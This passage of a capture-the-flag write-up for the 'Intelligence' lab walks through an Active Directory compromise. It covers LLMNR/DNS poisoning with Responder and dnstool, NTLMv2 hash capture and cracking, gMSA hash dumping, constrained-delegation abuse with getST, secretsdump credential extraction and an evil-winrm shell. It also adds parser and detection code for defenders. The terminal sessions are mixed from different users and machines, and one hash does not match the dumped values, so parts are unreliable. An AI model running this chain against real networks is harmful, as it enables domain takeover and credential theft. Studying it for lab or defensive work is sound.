[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.14]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP']



[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<--SNIP--->).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<---SNIP---->).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events..

Now let’s use dnstool to add a DNS record. You can find dnstool in the krbrelayx repository at https://github.com/dirkjanm/krbrelayx.git and install it as shown below.

root@Raj:~/HTB/Intelligence$ git clone https://github.com/dirkjanm/krbrelayx.git
Cloning into 'krbrelayx'...
remote: Enumerating objects: 98, done.
remote: Total 98 (delta 0), reused 0 (delta 0), pack-reused 98
Unpacking objects: 100% (98/98), 65.74 KiB | 474.00 KiB/s, done.
root@Raj:~/HTB/Intelligence$ cd krbrelayx/
root@Raj:~/HTB/Intelligence/krbrelayx$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md
root@Raj:~/HTB/Intelligence/krbrelayx$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d <YOUR IP> <MACHINE IP>
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/root/HTB/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
root@Raj:~/HTB/Intelligence/krbrelayx$

Now our record is in DNS, so let’s wait for the hash in Responder. Note that this may take up to 5 minutes, so be patient.

[+] Listening for events...
[HTTP] NTLMv2 Client   : <MACHINE IP>
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:1122334455667788:C8B5809269803AA43B885BE5C452F7CC:0101000000000000753D23B43271D701F88971DBE2AC9A9D000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000005390A83A090299C14BEA2A5D14212C5258BF7161A4DB11E0F11AAEC4B7116CC80A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
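To see what a captured NetNTLMv2 response actually tells you, here is an added example of my own (not part of the writeup or of Responder) that parses the Responder line above using only the standard library. The NTLMv2 blob carries the AV pairs the client included in its response, and MsvAvTargetName is the SPN the client thought it was connecting to. That is how a defender reviewing such a capture, or an NTLM audit log, can see that the scheduled task was talking to a host name that should not exist in the domain; the NetBIOS and DNS names in the blob come from the rogue server’s challenge, not from a real domain controller. Field layout follows MS-NLMP (NTLMv2_CLIENT_CHALLENGE and AV_PAIR).

```python
#!/usr/bin/python3
# Added example: decode the AV pairs of a NetNTLMv2 response captured by Responder.
import struct
from datetime import datetime, timedelta, timezone

# AvId values from MS-NLMP 2.2.2.1 (AV_PAIR).
AV_NAMES = {
    0x0000: "MsvAvEOL",
    0x0001: "MsvAvNbComputerName",
    0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName",
    0x0004: "MsvAvDnsDomainName",
    0x0005: "MsvAvDnsTreeName",
    0x0006: "MsvAvFlags",
    0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost",
    0x0009: "MsvAvTargetName",
    0x000A: "MsvAvChannelBindings",
}
UNICODE_AVS = {0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0009}

# The NetNTLMv2 line Responder printed above, copied verbatim as sample input.
CAPTURED = (
    "Ted.Graves::intelligence:1122334455667788:C8B5809269803AA43B885BE5C452F7CC:"
    "0101000000000000753D23B43271D701F88971DBE2AC9A9D000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000005390A83A090299C14BEA2A5D14212C5258BF7161A4DB11E0F11AAEC4B7116CC80A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000"
)


def filetime_to_datetime(ft):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(data, offset):
    """Walk the AV_PAIR list starting at offset until MsvAvEOL."""
    pairs = {}
    while True:
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        raw = data[offset:offset + av_len]
        offset += av_len
        if av_id == 0x0000:
            break
        name = AV_NAMES.get(av_id, f"Unknown({av_id:#06x})")
        if av_id in UNICODE_AVS:
            pairs[name] = raw.decode("utf-16-le")
        elif av_id == 0x0007:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", raw)[0])
        else:
            pairs[name] = raw.hex()  # flags, single-host data, channel bindings
    return pairs


def parse_netntlmv2(line):
    """Split a john/hashcat-style NetNTLMv2 line and decode its NTLMv2 blob."""
    user, _, rest = line.strip().partition("::")
    domain, server_challenge, nt_proof, blob_hex = rest.split(":", 3)
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: RespType(1) HiRespType(1) Reserved1(2) Reserved2(4)
    # TimeStamp(8) ChallengeFromClient(8) Reserved3(4) AvPairs(...)
    if (blob[0], blob[1]) != (1, 1):
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    timestamp = struct.unpack_from("<Q", blob, 8)[0]
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "nt_proof": nt_proof,
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": parse_av_pairs(blob, 28),
    }


def target_host(parsed):
    """Host part of the SPN the client was authenticating to, or None if absent."""
    spn = parsed["av_pairs"].get("MsvAvTargetName", "")
    return spn.split("/", 1)[1] if "/" in spn else None


if __name__ == "__main__":
    p = parse_netntlmv2(CAPTURED)
    print(f"{p['domain']}\\{p['user']} responded at {p['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    for k, v in p["av_pairs"].items():
        print(f"  {k:<22} {v}")
    print("client was connecting to:", target_host(p))
```

Run against the captured line this reports the victim account, the client-side timestamp, and HTTP/weboops.intelligence.htb as the target, i.e. exactly the record added with dnstool. On the defensive side, the same field is what makes alerting on NTLM authentications to unexpected HTTP SPNs possible.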

Now we have the NetNTLMv2 hash for Ted.Graves, so let's try to crack it. Here I have used john; you can also use hashcat (mode 5600) for the same, or an online cracker if you prefer.

root@Raj:~/HTB/Intelligence/krbrelayx$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy         (Ted.Graves)
1g 0:00:00:23 DONE (2021-07-05 03:40) 0.04170g/s 450978p/s 450978c/s 450978C/s Mrz.deltasigma..Mr BOB
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Now we have the password for Ted.Graves. Let's enumerate LDAP, since we already know there isn't much more on the share. The tool for this is gMSADumper (https://github.com/micahvandeusen/gMSADumper): it reads the msDS-ManagedPassword attribute of every group Managed Service Account the user is allowed to read (the principals listed in PrincipalsAllowedToRetrieveManagedPassword) and derives the account's NT hash from it.

root@Raj:~/HTB/Intelligence/gMSADumper$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

We have a hash, but unfortunately it's not in rockyou.txt. That is expected: a gMSA password is a long random value generated by the DC, so no wordlist will contain it. What matters is that the NT hash itself can be used as a Kerberos key.

root@Raj:~/HTB/Intelligence/gMSADumper$ sudo john new --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2021-07-05 03:43) 0g/s 3431Kp/s 3431Kc/s 3431KC/s      markinho..*7¡Vamos!
Session completed
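For reference, here is what gMSADumper computes from the directory. The msDS-ManagedPassword attribute is a MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS) holding the current and previous passwords as null-terminated UTF-16LE strings plus two intervals, and the NT hash is simply MD4 over the current password's UTF-16LE bytes. The example below is added for this page and is not gMSADumper's code; the blob it parses is constructed by build_sample_blob(), because a real blob is only returned to the principals named in msDS-GroupMSAMembership. MD4 is implemented inline since hashlib's md4 is often unavailable on OpenSSL 3 builds.

```python
import struct
from datetime import timedelta

M32 = 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320); used because hashlib.new('md4') may be disabled."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & M32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for chunk in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[chunk:chunk + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = rol((a + f(b, c, d) + x[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            a = rol((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & M32,
                    (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            a = rol((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & M32,
                    (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(utf16le_password):
    """NT hash = MD4 over the UTF-16LE password bytes, as hex."""
    return md4(utf16le_password).hex()


def parse_managed_password_blob(blob):
    """Parse MSDS-MANAGEDPASSWORD_BLOB: 16-byte header, then fields located by offset."""
    (version, _reserved, length, cur_off, prev_off,
     query_off, unchanged_off) = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("unexpected blob version or length")
    # CurrentPassword runs from its offset to the next field and is
    # null-terminated UTF-16LE, so the last two bytes are dropped.
    cur_end = prev_off if prev_off else query_off
    current = blob[cur_off:cur_end - 2]
    previous = blob[prev_off:query_off - 2] if prev_off else b""
    ticks = 10_000_000                        # both intervals are in 100 ns units
    query = struct.unpack_from("<Q", blob, query_off)[0]
    unchanged = struct.unpack_from("<Q", blob, unchanged_off)[0]
    return {
        "current_password": current,
        "previous_password": previous,
        "nt_hash": nt_hash(current),
        "query_interval": timedelta(seconds=query / ticks),
        "unchanged_interval": timedelta(seconds=unchanged / ticks),
    }


def sample_password():
    """CONSTRUCTED 120-character password (a real gMSA password is random UTF-16)."""
    return "".join(chr(0x21 + (i * 613) % 0xD700) for i in range(120))


def build_sample_blob(password, previous="", query_interval=timedelta(days=30),
                      unchanged_interval=timedelta(days=30)):
    """CONSTRUCTED blob in the layout the DC returns; not data from a real domain."""
    cur = password.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = 16
    prev_off = cur_off + len(cur) if prev else 0
    query_off = cur_off + len(cur) + len(prev)
    unchanged_off = query_off + 8
    length = unchanged_off + 8
    ft = lambda td: int(td.total_seconds() * 10_000_000)
    header = struct.pack("<HHIHHHH", 1, 0, length, cur_off, prev_off, query_off, unchanged_off)
    return header + cur + prev + struct.pack("<QQ", ft(query_interval), ft(unchanged_interval))


if __name__ == "__main__":
    info = parse_managed_password_blob(build_sample_blob(sample_password()))
    print("svc_int$:::" + info["nt_hash"])          # same shape as gMSADumper's output
    print("next password change in", info["query_interval"])
```

The QueryPasswordInterval in the blob is why the hash can go stale: the DC rotates the gMSA password on that schedule (30 days by default), and the blob only ever hands out the current and previous values.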

The other option is to use that NT hash as a Kerberos key. This step is often loosely called a silver ticket attack, but a silver ticket is forged offline from a service account's key; what getST does below is ask the KDC for tickets legitimately: it obtains a TGT for svc_int$ with the hash, then uses S4U2self and S4U2proxy to get a service ticket for WWW/dc.intelligence.htb in the name of Administrator. That only succeeds because svc_int$ is configured for constrained delegation with protocol transition to that SPN (msDS-AllowedToDelegateTo) and Administrator is not protected against delegation. Search for Kerberos constrained delegation abuse (S4U2self/S4U2proxy) to learn more. Let's try it.

root@Raj:~/HTB/Intelligence/newLdapDump$ getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

It fails with KRB_AP_ERR_SKEW. Kerberos rejects requests whose timestamp differs from the KDC's clock by more than the allowed skew (5 minutes by default), so the attacking machine's clock has to be synced with the DC. Use ntpdate for that; if you don't have ntpdate you can install it using

sudo apt-get install ntpdate

then run the command

sudo ntpdate <MACHINE IP>

With the clock synced, run getST again. If ntpdate does not actually change the time, try the following

sudo apt-get install chrony
sudo timedatectl set-ntp true
sudo ntpdate <machine IP>

And, if your VM keeps getting its clock reset, stop VirtualBox from overriding it:

Prevent VirtualBox Guest Syncing Time with Host

The VirtualBox user manual covers this under the "Disabling the Guest Additions time synchronization" heading: once installed and started, the VirtualBox Guest Additions try to synchronize the guest time with the host time, which undoes the ntpdate sync. This can be prevented by forbidding the guest service from reading the host clock. On the host, open CMD.exe as Administrator, change into the VirtualBox folder and run the command below (replacing VM name with the name of the virtual machine you want to affect):

cd C:\Program Files\Oracle\VirtualBox
VBoxManage setextradata "VM name" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1

The guest will then stop syncing with the host and keep the time set by ntpdate (as long as the guest's region and time zone are set correctly).

Now run getST again:

root@Raj:~/HTB/Intelligence$ getST.py intelligence.htb/svc_int$  -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Now let's use that ticket to authenticate. Two things to be aware of here. First, the ticket was requested for WWW/dc.intelligence.htb, yet Impacket's smbclient.py can use it against SMB: the service name in a service ticket is not part of the encrypted portion, and every SPN on the DC maps to the same DC$ long-term key, so the SMB service decrypts and accepts it. Second, gMSA passwords are rotated automatically by the DC (every 30 days by default), so a hash dumped earlier can go stale; with a stale hash getST fails at the TGT step with KDC_ERR_PREAUTH_FAILED, as in the attempt below that was run with a different hash value. The fix is to re-run gMSADumper and use the current hash.

┌──(kali㉿puckie)-[~/htb/intelligence]
└─$ impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

┌──(kali㉿puckie)-[~/htb/intelligence]
└─$ export KRB5CCNAME=Administrator.ccache

┌──(kali㉿puckie)-[~/htb/intelligence]
└─$ smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# dir
*** Unknown syntax: dir
# ls
[-] No share selected
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# use Users
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Sun Apr 18 20:51:57 2021 .
drw-rw-rw- 0 Sun Apr 18 20:51:57 2021 ..
-rw-rw-rw- 282 Sun Apr 18 20:40:10 2021 desktop.ini
-rw-rw-rw- 34 Sun Oct 24 16:21:15 2021 root.txt
# get root.txt
#
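Whether you are defending or just want to know how noisy this is, it is worth knowing what the steps above leave in the DC's Security log. getST with -hashes requests the TGT with RC4 pre-authentication (Event 4768 with Ticket Encryption Type 0x17), and the S4U2proxy step produces a service ticket request (Event 4769) whose Transited Services field (TransmittedServices in the event XML) names the delegating account while the Account Name is the impersonated user. The checker below is an added example for this page, not a vendor detection rule; the records it runs over are constructed to mirror this attack, carry only a subset of the real event fields, and use a made-up client address.

```python
# Detection example for the constrained-delegation abuse shown above.
# EVENTS are CONSTRUCTED records; field names follow the EventData names
# of Windows Security events 4768 (TGT request) and 4769 (service ticket request).
ATTACKER = "::ffff:10.10.14.5"          # made-up client address

EVENTS = [
    # Normal user logon: AES TGT, then an ordinary service ticket, no delegation.
    {"EventID": 4768, "TargetUserName": "Ted.Graves", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0",
     "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4769, "TargetUserName": "Ted.Graves@INTELLIGENCE.HTB", "ServiceName": "DC$",
     "TransmittedServices": "-", "IpAddress": "::ffff:10.10.10.50"},
    # getST -hashes: the TGT for svc_int$ is requested with RC4 (0x17) pre-auth.
    {"EventID": 4768, "TargetUserName": "svc_int$", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "2", "Status": "0x0",
     "IpAddress": ATTACKER},
    # S4U2proxy: ticket for WWW/dc (an SPN held by DC$) in the name of Administrator,
    # with the delegating account recorded in Transited Services.
    {"EventID": 4769, "TargetUserName": "Administrator@INTELLIGENCE.HTB", "ServiceName": "DC$",
     "TransmittedServices": "svc_int$@INTELLIGENCE.HTB", "IpAddress": ATTACKER},
]

PRIVILEGED = {"administrator", "krbtgt"}      # extend with your own tier-0 accounts
RC4_HMAC = "0x17"


def account_name(principal):
    """'Administrator@INTELLIGENCE.HTB' -> 'administrator'."""
    return principal.split("@", 1)[0].lower()


def is_privileged(principal):
    return account_name(principal) in PRIVILEGED


def analyze_kerberos_events(events):
    """Return findings for RC4 TGT requests and S4U2proxy delegation, correlated by client."""
    findings = []
    rc4_tgts = set()                          # (client address, account) pairs
    for ev in events:
        if ev.get("EventID") == 4768:
            if ev.get("Status") == "0x0" and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC:
                rc4_tgts.add((ev.get("IpAddress"), account_name(ev["TargetUserName"])))
                findings.append({"rule": "rc4_tgt_request", "severity": "medium",
                                 "account": ev["TargetUserName"], "client": ev.get("IpAddress")})
        elif ev.get("EventID") == 4769:
            transited = ev.get("TransmittedServices", "-")
            if transited in ("", "-"):        # Windows logs "-" when no S4U2proxy was involved
                continue
            finding = {"rule": "s4u2proxy_delegation",
                       "severity": "high" if is_privileged(ev["TargetUserName"]) else "low",
                       "impersonated": ev["TargetUserName"],
                       "delegating_account": transited,
                       "target_service": ev["ServiceName"],
                       "client": ev.get("IpAddress")}
            # Correlate: did the delegating account get its TGT with RC4 from the same client?
            if (ev.get("IpAddress"), account_name(transited)) in rc4_tgts:
                finding["note"] = "delegating account obtained an RC4 TGT from the same client"
                finding["severity"] = "high"
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze_kerberos_events(EVENTS):
        print(f)
```

Delegation to a DC-held SPN is legitimate only for the few services configured for it, so the useful tuning is an allow-list of expected (delegating account, target service) pairs rather than suppressing the rule; the RC4 indicator stands out wherever accounts are AES-capable, because a client that only has an NT hash cannot request AES pre-authentication.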

We now have Administrator on the DC, so let's collect the rest: dump the secrets and get a shell.

┌─[puck@parrot-lt]─[~/htb/forest]
└──╼ $python3 secretsdump.py puck@dc.intelligence.htb
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xcae14f646af6326ace0e1f5b8b4146df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0054cc2f7ff3b56d9e47eb39c89b521f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
intelligence\DC$:aes256-cts-hmac-sha1-96:ef69aec3a0800ea87494d300dbdb5e10804669185c8f9829c24446e8300faf56
intelligence\DC$:aes128-cts-hmac-sha1-96:27c6f98a10b4e70e03c29ccfe09df2b5
intelligence\DC$:des-cbc-md5:679b8670d6c49885
intelligence\DC$:plain_password_hex:6fb7ec8f3b653eb57df51613799aea4d4b7c80752176239a90056ede6993a4ff5972d9e05c0071e295c3b68ee3a14a52956abdd6abfa57af4cb496aa385736c5ac895db24a54b7bac7faaa891d545add05e0086f049a525a47cfb1229226ece995b4892db30d0f66902b9ed0b8503ba1a5558d4d08be929bee7e69f9f13acdba6aaf73322f2c625b9f31e7344dd9545b668da2bb9bb2fafd4250a321982956a389a4d9ae7feffb8b910315cb6de1adcc99f377f0ad3be01e2644536486dd7b9287f5086257a747a39b5c1985ad3de2ce6fff756a32ad8f07cef0735c243b64e5ea5b19e207b37c638bd82f88e05cc77b
intelligence\DC$:aad3b435b51404eeaad3b435b51404ee:2554016426dba8b5e25a09b630fbde1a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc3430503ab11d38db01911c159fe940bd8ec7cdb
dpapi_userkey:0x43fdd77605cdb58e14fb6a5c90c976fde8f4f2ea
[*] NL$KM 
--snip--
┌─[✗]─[puck@parrot-lt]─[~/htb/intelligence]
└──╼ $evil-winrm -u administrator -i dc.intelligence.htb -H 9075113fe16cf74f7c0f9b27e882dad3

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
